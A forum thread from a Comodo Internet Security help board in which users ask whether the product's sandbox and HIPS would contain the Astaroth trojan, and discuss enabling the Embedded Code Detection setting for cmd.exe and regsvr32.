Astaroth vs CIS Sandbox and HIPS, what would happen?

Comodo Internet Security - CIS Defense+ / Sandbox Help - CIS
1

Astaroth is a Trojan that uses legitimate processes in order to download,install and run the malware.

Overview:

https://i.ibb.co/gdZFGPw/image.png

I would expect CIS to contain the malicious modules once they are executed by the relative trusted parent files. Or even contain the Javascript from reaching a none-sandboxed version of BitsAdmin. However I just wanted to double check if either would be the case.

More info on the Astaroth Trojan: Astaroth Malware Uses Legitimate OS and Antivirus Processes to Steal Passwords and Personal Data

Look forward to learning more about this!

2

Only if embedded-code detection is turned on for cmd.exe which by default is disabled due to many complaints.

3

So you are saying this might be a bypass on default settings?

4

Yes up to a certain extent as I think that once the stage of executing a .dll file using regsrv32 it should be stopped at that point, assuming it doesn’t use the avast process if avast is not installed.

5

Ah that is what I was thinking. I wasn’t sure on the Javascript bit though.

Very interesting, thanks!

6

Sorry, but I missed something. “Only if embedded-code detection is turned on for cmd.exe which by default is disabled” I’m vulnerable or “Only if embedded-code detection is turned on for cmd.exe which by default is disabled” I’m protected?

7

You may be vulnerable to an extent as per mentioned above, if embedded-code detection for cmd.exe is turned off.

8

I just took a look at my settings, and Embedded Code Detection is disabled for regsrv32 as well as cmd.exe. Does that mean I am completely vulnerable? Is there a best practice for what to enable Embedded Code Detection against?

9

First of all, you may not be completely vulnerable.

This is because the malware relies on .dll files to run the main payload.

Comodo is still likely to contain these .dll files as soon as they are executed. Thus the main payload will likely be contained as normal.

Enabling ‘Embedded Code Detection’ for cmd.exe may be enough to prevent the exploit up to that point from happening in the first place though.

As for best practice in general of what to enable/disable, I will leave that to someone else to answer.

I would prefer Comodo simply at least enables more files under ‘Embedded Code Detection’ as default.